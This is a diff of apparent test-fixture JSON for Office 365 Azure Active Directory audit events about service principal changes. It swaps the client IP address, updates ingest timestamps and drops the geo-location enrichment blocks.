@@ -5018,12 +4568,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036220300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\
"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124973800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Val
ue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -5049,25 +4599,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5081,7 +4613,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", 
@@ -5217,7 +4749,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -5229,12 +4761,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036225500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124980600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"N
ame\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryse
rvice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -5260,25 +4792,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5292,7 +4806,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -5428,7 +4942,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -5440,12 +4954,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036230900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https:/